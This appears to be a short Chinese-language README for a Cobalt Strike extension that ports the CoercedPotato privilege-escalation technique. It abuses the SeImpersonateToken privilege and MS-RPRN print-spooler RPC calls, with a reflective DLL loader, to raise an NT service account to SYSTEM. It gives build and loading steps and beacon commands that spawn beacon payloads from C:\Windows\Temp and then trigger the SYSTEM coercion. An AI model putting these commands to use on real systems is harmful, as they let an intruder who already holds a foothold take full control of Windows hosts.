利用 SeImpersonateToken 权限和 MS-RPRN 函数,将权限从 NT 服务提升至 SYSTEM。
主要基于 https://github.com/Prepouce/CoercedPotato
反射加载器来自 https://github.com/stephenfewer/ReflectiveDLLInjection。
克隆此仓库并在 VisualStudio 中编译项目,然后将 dist/coercedpotato.cna 加载到 CobaltStrike。
首先需要使用以下命令生成 RPC 监听器:
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
例如:
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
然后您可以触发一个 SYSTEM 调用:
beacon> CoercedPotato coerce